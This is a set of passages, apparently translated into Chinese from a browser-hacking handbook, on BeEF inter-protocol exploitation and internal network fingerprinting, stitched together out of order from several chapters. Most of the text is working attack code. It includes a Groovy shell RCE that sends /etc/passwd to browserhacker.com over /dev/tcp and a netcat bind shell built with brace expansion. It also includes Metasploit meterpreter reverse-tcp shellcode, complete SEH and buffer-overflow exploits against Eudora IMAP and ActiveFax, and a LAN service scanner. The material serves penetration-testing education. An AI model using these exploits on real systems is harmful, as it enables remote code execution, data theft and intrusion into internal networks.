以下代码负责计算首部的大小,之后把结果返回给勾连浏览器: # 确定跨源HTTP首部的确切大小 # 需要正确计算junk,避免出错 # 完成的URL是<BeEF_server>/api/ipec/junk/<socket_name> get '/junk/:name' do socket_name = params[:name] halt 401 if not BeEF::Filters.alphanums_only?(socket_name) socket_data = BeEF::Core::NetworkStack::Handlers::AssetHandler. \ instance.get_socket_data(socket_name) halt 404 if socket_data == nil if socket_data.include?("\r\n\r\n") result = Hash.new headers = socket_data.split("\r\n\r\n").first BeEF::Core::NetworkStack::Handlers::AssetHandler. \ instance.unbind_socket(socket_name) print_info "[IPEC] Cross-origin XmlHttpRequest headers \ size - received from bind socket [#{socket_name}]: \ #{headers.size + 4} bytes." # CRLF -> 4 B result['size'] = headers.size + 4 headers.split("\r\n").each do |line| if line.include?("Host") result['host'] = line.size + 2 end if line.include?("Content-Type") result['contenttype'] = line.size + 2 end if line.include?("Referer") result['referer'] = line.size + 2 end end result.to_json else print_error "[IPEC] Looks like there is no CRLF \ in the data received!" halt 404 end end 拿到这些信息之后,就可以放心地动态计算NOP的数量(或其他额外垃圾的大小),再通过勾连浏览器把利用payload发送到目标服务。
Rodrigo Marcos和SecForce团队扩展了他们的研究,在不需要事先计算HTTP首部长度的前提下,成功利用了认证后漏洞 38 : 37 Ty Miller and Michele Orrù. (2012). Exploiting internal network vulns via the browser using BeEF Bind . Retrieved October 29, 2013 from http://2012.ruxcon.org.au/speakers/#Ty%20Miller%20&%20Michele%20Orru 38 SecForce. (2013). Inter-Protocol Communication-Exploitation . Retrieved October 29, 2013 from http://www.secforce.com/blog/tag/inter-protocol-exploitation/ var auth = 'USER anonymous\r\nPASS anonymous\r\n'; var payload = 'MKD \x89[…shellcode…]'; var body = auth + payload; 他们把对EasyFTP Server的一个利用,移植到在HTTP的POST请求体内提交的IPE。
39 Denis Bazhenov. (2013). Groovy Shell server . Retrieved October 29, 2013 from https://github.com/bazhenov/groovy-shell-server 在这个例子中,RCE利用要比更复杂的溢出简单,因为不需要关注内存分配或Shellcode。
其实就是一个把Groovy代码封装到HTTP的POST请求中的问题,如下所示: var rhost = '192.168.0.100'; // Targeted host var rport = '6789'; // Targeted port // 多数Linux发布版(Debian、Ubuntu,等等)都支持/dev/tcp var cmd = 'cat /etc/passwd >/dev/tcp/browserhacker.com/8888'; // 使用Groovy的"command".execute()方法创建最终内容 var payload = "\r\ndiscard\r\nprintln '" + cmd + "'.execute().text\r\ngo\r\nexit\r\n"; // 发送POST请求 beef.dom.createIframeIpecForm(rhost, rport, "/", payload); 通过其中的payload变量值可以看出,命令 cmd 会像Java执行系统命令一样被执行。 在Java中,我们需要执行: String cmd = "uname -ra"; Runtime.getRuntime().exec(cmd); 虽然Groovy语言的语法稍微能简化一点,但执行相同的任务的代码还是挺像的: def cmd = "uname -ra" cmd.execute() 如果被利用的服务器运行在Linux操作系统上,而且该系统配置了/dev/tcp设备,那就可以把/etc/passwd的内容抽取到browserhacker.com:8888。
40 Brendan Coles. (2011). EXTRACT Inter-Protocol exploitation . Retrieved October 29, 2013 from http://itsecurit-ysolutions.org/2011-12-16-Privilege-escalation-and-remote-inter-protocol-exploitation-with-EXTRACT-0.5.1/ 与前面的Groovy Shell利用不同,EXTRACT稍微狡猾一点。
有经验的渗透测试人员可能熟悉下面这个不包含任何空格的攻击向量: {netcat,-l,-p,1337,-e,/bin/bash} 这个向量使用了Linux系统Bash终端里的 Bracket Expansion功能 41 。
41 GNU. (2013). Bash Brace Expansion . Retrieved October 29, 2013 from https://www.gnu.org/software/bash/manual/html_node/Brace-Expansion.html 最终针对EXTRACT 0.5.1服务的攻击向量如下: var cmd = "{netcat,-l,-p,1337,-e,/bin/bash}"; var payload = 'createuser '+cmd+'&>/dev/null; echo;\r\nquit\r\n'; beef.dom.createIframeIpecForm(host, port, "/index.html", payload); 如果命令如期执行,那么应该可以通过Netcat连接到目标主机的1337端口,并取得终端控制权。
42 Tim Shelton. (2005). Qualcomm WorldMail IMAPD Buffer Overflow Vulnerability . Retrieved October 29, 2013 from http://www.securityfocus.com/bid/15980/info 图 10-20 位于进程内存中的HTTP首部 要成功利用该服务,需要知道浏览器发送的HTTP首部组合起来的数据长度。
假设BeEF运行在browserhacker.com:3000上,而HTTP计算服务器套接字在端口2000上。 可以使用下面的JavaScript代码,计算后面的利用请求中要用到的HTTP首部大小: var beef_host = "http://browserhacker.com"; var beef_junk_port = 2000; var uri = "http://" + beef_host + ":" + beef_junk_port + "/"; var xhr = new XMLHttpRequest(); xhr.open("POST", uri, true); xhr.setRequestHeader("Content-Type", "text/plain"); xhr.setRequestHeader('Accept','*/*'); xhr.setRequestHeader("Accept-Language", "en"); xhr.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); 套接字接收到请求后,BeEF控制台就会给出如下消息: [18:56:06][*] [IPEC] Cross-origin XmlHttpRequest headers size - received from bind socket [imapeudora1]: 443 bytes. 这样BeEF服务器知道了跨域HTTP请求首部的确切大小。
以下Metasploit命令就可以为你生成Shellcode payload: msf payload(reverse_tcp) > use payload/windows/meterpreter/reverse_tcp msf payload(reverse_tcp) > set LHOST 172.16.37.1 LHOST => 172.16.37.1 msf payload(reverse_tcp) > set LPORT 9999 LPORT => 9999 msf payload(reverse_tcp) > generate -b "\x00\x0a\x0d\x20\x7b" # windows/meterpreter/reverse_tcp - 317 bytes (stage 1) # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # VERBOSE=false, LHOST=172.16.37.1, LPORT=9999, buf = "\xda\xdf\xd9\x74\x24\xf4\xbe\xba\xeb\xc6\xfc\x5a\x29\xc9" + "\xb1\x49\x83\xea\xfc\x31\x72\x15\x03\x72\x15\x58\x1e\x3a" + "\x14\x15\xe1\xc3\xe5\x45\x6b\x26\xd4\x57\x0f\x22\x45\x67" + "\x5b\x66\x66\x0c\x09\x93\xfd\x60\x86\x94\xb6\xce\xf0\x9b" + "\x47\xff\x3c\x77\x8b\x9e\xc0\x8a\xd8\x40\xf8\x44\x2d\x81" + "\x3d\xb8\xde\xd3\x96\xb6\x4d\xc3\x93\x8b\x4d\xe2\x73\x80" + "\xee\x9c\xf6\x57\x9a\x16\xf8\x87\x33\x2d\xb2\x3f\x3f\x69" + "\x63\x41\xec\x6a\x5f\x08\x99\x58\x2b\x8b\x4b\x91\xd4\xbd" + "\xb3\x7d\xeb\x71\x3e\x7c\x2b\xb5\xa1\x0b\x47\xc5\x5c\x0b" + "\x9c\xb7\xba\x9e\x01\x1f\x48\x38\xe2\xa1\x9d\xde\x61\xad" + "\x6a\x95\x2e\xb2\x6d\x7a\x45\xce\xe6\x7d\x8a\x46\xbc\x59" + "\x0e\x02\x66\xc0\x17\xee\xc9\xfd\x48\x56\xb5\x5b\x02\x75" + "\xa2\xdd\x49\x12\x07\xd3\x71\xe2\x0f\x64\x01\xd0\x90\xde" + "\x8d\x58\x58\xf8\x4a\x9e\x73\xbc\xc5\x61\x7c\xbc\xcc\xa5" + "\x28\xec\x66\x0f\x51\x67\x77\xb0\x84\x27\x27\x1e\x77\x87" + "\x97\xde\x27\x6f\xf2\xd0\x18\x8f\xfd\x3a\x31\x25\x07\xad" + "\x92\xa9\x22\x2c\x83\xcb\x2c\x09\x5c\x42\xca\x3f\x72\x02" + "\x44\xa8\xeb\x0f\x1e\x49\xf3\x9a\x5a\x49\x7f\x28\x9a\x04" + "\x88\x45\x88\xf1\x78\x10\xf2\x54\x86\x8f\x99\x58\x12\x2b" + "\x08\x0e\x8a\x31\x6d\x78\x15\xca\x58\xf2\x9c\x5e\x23\x6d" + "\xe1\x8e\xa3\x6d\xb7\xc4\xa3\x05\x6f\xbc\xf7\x30\x70\x69" + "\x64\xe9\xe5\x91\xdd\x5d\xad\xf9\xe3\xb8\x99\xa6\x1c\xef" + "\x1b\x9b\xca\xd6\x99\xed\x78\x3b\x62" 根据之前计算的HTTP首部,需要考虑的字节是426字节。
可以使用以下JavaScript代码,将Stager发送给目标IMAP服务,当然首先得计算出总共可用的空间和HTTP首部的大小: var stager = "B33FB33F" + "\xda\xdf\xd9\x74\x24\xf4\xbe\xba\xeb\xc6\xfc\x5a\x29\xc9" + "\xb1\x49\x83\xea\xfc\x31\x72\x15\x03\x72\x15\x58\x1e\x3a" + "\x14\x15\xe1\xc3\xe5\x45\x6b\x26\xd4\x57\x0f\x22\x45\x67" + "\x5b\x66\x66\x0c\x09\x93\xfd\x60\x86\x94\xb6\xce\xf0\x9b" + "\x47\xff\x3c\x77\x8b\x9e\xc0\x8a\xd8\x40\xf8\x44\x2d\x81" + "\x3d\xb8\xde\xd3\x96\xb6\x4d\xc3\x93\x8b\x4d\xe2\x73\x80" + "\xee\x9c\xf6\x57\x9a\x16\xf8\x87\x33\x2d\xb2\x3f\x3f\x69" + "\x63\x41\xec\x6a\x5f\x08\x99\x58\x2b\x8b\x4b\x91\xd4\xbd" + "\xb3\x7d\xeb\x71\x3e\x7c\x2b\xb5\xa1\x0b\x47\xc5\x5c\x0b" + "\x9c\xb7\xba\x9e\x01\x1f\x48\x38\xe2\xa1\x9d\xde\x61\xad" + "\x6a\x95\x2e\xb2\x6d\x7a\x45\xce\xe6\x7d\x8a\x46\xbc\x59" + "\x0e\x02\x66\xc0\x17\xee\xc9\xfd\x48\x56\xb5\x5b\x02\x75" + "\xa2\xdd\x49\x12\x07\xd3\x71\xe2\x0f\x64\x01\xd0\x90\xde" + "\x8d\x58\x58\xf8\x4a\x9e\x73\xbc\xc5\x61\x7c\xbc\xcc\xa5" + "\x28\xec\x66\x0f\x51\x67\x77\xb0\x84\x27\x27\x1e\x77\x87" + "\x97\xde\x27\x6f\xf2\xd0\x18\x8f\xfd\x3a\x31\x25\x07\xad" + "\x92\xa9\x22\x2c\x83\xcb\x2c\x09\x5c\x42\xca\x3f\x72\x02" + "\x44\xa8\xeb\x0f\x1e\x49\xf3\x9a\x5a\x49\x7f\x28\x9a\x04" + "\x88\x45\x88\xf1\x78\x10\xf2\x54\x86\x8f\x99\x58\x12\x2b" + "\x08\x0e\x8a\x31\x6d\x78\x15\xca\x58\xf2\x9c\x5e\x23\x6d" + "\xe1\x8e\xa3\x6d\xb7\xc4\xa3\x05\x6f\xbc\xf7\x30\x70\x69" + "\x64\xe9\xe5\x91\xdd\x5d\xad\xf9\xe3\xb8\x99\xa6\x1c\xef" + "\x1b\x9b\xca\xd6\x99\xed\x78\x3b\x62"; /* * Egg Hunter (Skape's NtDisplayString technique). * Original size: 32 bytes */ var egg_hunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" + "\xef\xb8\x42\x33\x33\x46\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"; var next_seh = "\xeb\x06\x90\x90"; var seh = "\x4e\x3b\x01\x10"; // POP ECX mailcmn.dll gen_nops = function(count){ var i = 0; var result = ""; while(i < count ){ result += "\x90";i++;} log("gen_nops: generated " + result.length + " nops."); return result; }; var available_space = 769; var headers_size = 423; // 要生成的NOP字节数 var junk = available_space - stager.length - headers_size; var junk_data = gen_nops(junk); // 最后的shellcode var payload = junk_data + stager + next_seh + seh + egg_hunter; var url = "http://172.16.37.151:143/"; var xhr = new XMLHttpRequest(); // 为了基于WebKit的浏览器 if (!XMLHttpRequest.prototype.sendAsBinary) { XMLHttpRequest.prototype.sendAsBinary = function (sData) { var nBytes = sData.length, ui8Data = new Uint8Array(nBytes); for (var nIdx = 0; nIdx < nBytes; nIdx++) { ui8Data[nIdx] = sData.charCodeAt(nIdx) & 0xff; } /* send as ArrayBufferView...: */ this.send(ui8Data); }; } xhr.open("POST", url, true); xhr.setRequestHeader("Content-Type", "text/plain"); xhr.setRequestHeader('Accept','*/*'); xhr.setRequestHeader("Accept-Language", "en"); var post_body = "a001 LIST " + "}" + payload + "}" + "\r\n"; xhr.sendAsBinary(post_body); 运行以上代码,一个POST请求就会被发送到有漏洞的Eudora IMAP服务监听的172.16.37. 151:143端口,如图10-21所示。
43 Craig Freyman. (2013). ActiveFax raw server exploit . Retrieved October 29, 2013 from http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html ActiveFax可以让用户使用LPD、RAW和FTP协议发送和接收传真。
44 ActFax. (2013). ActiveFax manual . Retrieved October 29, 2013 from http://www.actfax.com/download/actfax_manual_en.pdf 缓冲区溢出的条件存在于 @F506 命令,该命令负责以特定文件格式和分辨率输出传真。
下面的代码可以在勾连浏览器中运行,运行后会将Meterpreter Stager注入内存,从而利用我们说的缓冲区溢出漏洞: var target = "http://172.16.37.151"; var port = 3000; var xhr = null; // Meterpreter reverse_tcp stager // 回连172.16.37.1:4444 // 以x86/alpha_mixed编码 var stager = "\x89\xe2\xda[...snip...]"; // jmp esp in ole32.dll - Win XP SP3 English var eip = '\x77\x9c\x55\x77'; // 对齐栈 var adjust = '\x81\xc4\x24\xfa\xff\xff'; var shellcode_chunk_1 = stager.slice(0,554); var shellcode_chunk_2 = stager.slice(554, stager.length); function genJunk(c, length){ var temp = ""; for(var i=0;i<length;i++){ temp += c; } return temp; } var fill = genJunk("\x42", (1024 - shellcode_chunk_2.length)); function sendRequest(port, data){ xhr = new XMLHttpRequest(); // 对WebKit浏览器 var url = target + ":"+ port; if (!XMLHttpRequest.prototype.sendAsBinary) { XMLHttpRequest.prototype.sendAsBinary = function (sData) { var nBytes = sData.length, ui8Data = new Uint8Array(nBytes); for (var nIdx = 0; nIdx < nBytes; nIdx++) { ui8Data[nIdx] = sData.charCodeAt(nIdx) & 0xff; } /* 发送ArrayBufferView...: */ this.send(ui8Data); }; } xhr.open("POST", url, true); xhr.setRequestHeader("Content-Type", "text/plain"); xhr.setRequestHeader('Accept','*/*'); xhr.setRequestHeader("Accept-Language", "en"); xhr.sendAsBinary(data); } // 最终的利用代码 var payload = shellcode_chunk_2 + fill + eip + adjust + shellcode_chunk_1; var stager_request = "@F506 " + payload + "@\r\n\r\n"; sendRequest(port, stager_request); setTimeout(function(){ xhr.abort(); }, 2000); RAW服务器默认的套接字超时为60秒,而Shellcode只能在连接断开时执行。
45 Mozilla. (2013). XMLHttpRequest abort() method . Retrieved October 29, 2013 from https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest?redirectlocale=en-US&redirectslug=DOM%2FXMLHttpRequest#abort() 运行前面代码的结果如图10-23所示。
举个例子,如果在前面ActiveFax的代码示例中,由于目标不是XP SP3 English,我们要修改 ole32.dll 中的指令 JMP ESP ,那就可以用Mona。 只要把Immunity Debugger附加到ActiveFax,然后执行命令 !mona jmp -r esp 就行了,产生的结果如下所示(第一个地址在利用的例子中用过): 0x77559c77 : jmp esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6435 (C:\WINDOWS\system32\ole32.dll) 0x7755a9a8 : jmp esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6435 (C:\WINDOWS\system32\ole32.dll) Mona还有非常丰富的功能,包括半自动的Metasploit模板生成器。
46 Corelan Team. (2013). Mona . Retrieved October 29, 2013 from http://redmine.corelan.be/projects/mona 前面的例子使用的都是在/etc/hosts/中映射到172.16.37.1的browserhacker.com,因为为了演示,我们使用了VMware虚拟机。
内网外出流量过滤系统可能会检测并过滤从内网服务器到外部互联网主机的请求,而警惕的系统管理员也会对那些并非从内部到内部,而是从内部到一个未知外部系统的通信睁大眼睛。
更常见的情况是,希望维持自己安全形象的厂商却无力修复浏览器的问题。 修复浏览器的安全bug常常被开发者排在最低优先级,这与安全社区的期望恰恰相反。
15 Mozilla. (2013). Firefox Notes - Desktop . Retrieved December 15, 2013 from http://www.mozilla.org/en-US/firefox/18.0/releasenotes/ 16 Mozilla. (2013). 62178 - implement mechanism to prevent sending insecure requests from a secure context . Retrieved December 15, 2013 from https://bugzilla.mozilla.org/show_bug.cgi?id=62178 从终端用户对浏览器安全升级没有发言权这一点来说,浏览器与其他软件也没有什么差别。
17 Thomas Duebendorfer and Stefan Frei. (2009). Why Silent Updates Boost Security . Retrieved December 15, 2013 from http://research.google.com/pubs/pub35246.html 这方面一个明显的例子,就是谷歌在Chrome中部署自己的PDF渲染引擎取代Adobe Reader。
这样所有组织的安全团队都不得不在某种程度上依赖浏览器的开发者,而在浏览器开发者对终端用户组织的需求还不够关注的情况下,这种依赖着实令人懊恼。
但扩展可以影响浏览器加载的每一个页面,反过来,每个页面又会影响扩展。 每个扩展都可能成为攻击者的目标,因而它们会增大浏览器的攻击面。 有时候,常见的XSS隐患也会通过扩展进入浏览器。
1.4.2 放弃控制 浏览器从互联网上的任意地点请求指令,其主要功能是把内容呈现于屏幕之上,为用户与内容交互提供界面,而且会严格按照作者设计的方式呈现。
1.4.4 加密通信 为了保证加密信息的完整性和机密性,可以使用SSL和TLS与受信任的组织通信,而同样的技术也可以用于与攻击者进行安全的通信。
18 Andrew Gregory. (2008). Andrew Gregory - The Myth of the Robustness Principle . Retrieved December 15, 2013 from http://my.opera.com/AndrewGregoryScss/blog/2008/05/27/the-myth-of-the-robustness-principle http://my.opera.com/Andrew%20Gregory/blog/2008/05/27/the-myth-of-the-robustness-principle 浏览器对自己要渲染的内容是极其开放的。
首先,就是要有需要检测的一组目标IP,比如: ips = [ '192.168.0.1', '192.168.0.100', '192.168.0.254', '192.168.1.1', '192.168.1.100', '192.168.1.254', '10.0.0.1', '10.1.1.1', '192.168.2.1', '192.168.2.254', '192.168.100.1', '192.168.100.254', '192.168.123.1', '192.168.123.254', '192.168.10.1', '192.168.10.254' ]; 这个例子中给出的都是局域网中的私有IP。
指纹采集数据库类似这样: var fingerprint_data = new Array( new Array( "JBoss Application server", "8080","http",true, "/images/logo.gif",226,105), new Array( "VMware ESXi Server", "80","http",false, "/background.jpeg",1,1100), new Array( "Glassfish Server", "4848","http",false, "/theme/com/sun/webui/jsf/suntheme \ /images/login/gradlogsides.jpg", 1, 200), new Array( "m0n0wall", "80","http",false, "/logo.gif",150,47) ); 这个fingerprint_data数据结构中的每个数组元素,都包含域名、端口和协议类型,可用于请求图片路径,最后是图片的宽度和高度值。 如果你想知道更完整的(但并不是最完整的)指纹采集数据库,可以看看BeEF的internal_network_fingerprinter模块,这里顺便感谢Brendan Coles为此付出的心血 4 。
4 BeEF Project. (2012). Internal Network Fingerprinter . Retrieved October 8, 2013 from https://github.com/beefproject/beef/tree/master/modules/network/internal_network_fingerprinting 有了IP,也有了图片,就可以把下面的JavaScript代码注入勾连浏览器的DOM了。 这段代码会检查上面的IP(或者你指定的其他IP)是否在运行具有fingerprint_data中某个特征的Web应用: var dom = document.createElement('b'); // 每个IP for(var i=0; i < ips.length; i++) { // 数据集中的每个应用 for(var u=0; u < fingerprint_data.length; u++) { var img = new Image; img.id = u; img.src = fingerprint_data[u][2]+"://"+ips[i] +":"+fingerprint_data[u][1]+ fingerprint_data[u][4]; // 触发onload事件,找到图片 img.onload = function() { // 再次检查宽度和高度 if (this.width == fingerprint_data[this.id][5] && this.height == fingerprint_data[this.id][6]) { console.log("Detecting [" + fingerprint_data[this.id][0] + "] at IP [" + ips[i] + "]"); // 通知BeEF服务器 beef.net.send('<%= @command_url %>', <%= @command_id %>, 'discovered='+escape(fingerprint_data[this.id][0])+ "&url="+escape(this.src) ); // 完工,从DOM中删除图片 dom.removeChild(this); } } // 将图片添加到DOM dom.appendChild(img); }} 前面的代码运行后,会尝试将所有资源加载到各自的内嵌框架。
图 9-3 找到了VMware ESXi服务器 2. 请求页面 很多CMS和一般Web应用的指纹采集工具都有一个大型的数据库,其中包含CMS的类型、版本、主题和插件信息。
5 Chris Sullo. (2010). CMS Explorer . Retrieved June 15, 2013 from http://code.google.com/p/cms-explorer/ 要检测某个应用是否存在特定的路径,比如modules/filebrowser/,可以采用与之前检测图片类似的方法。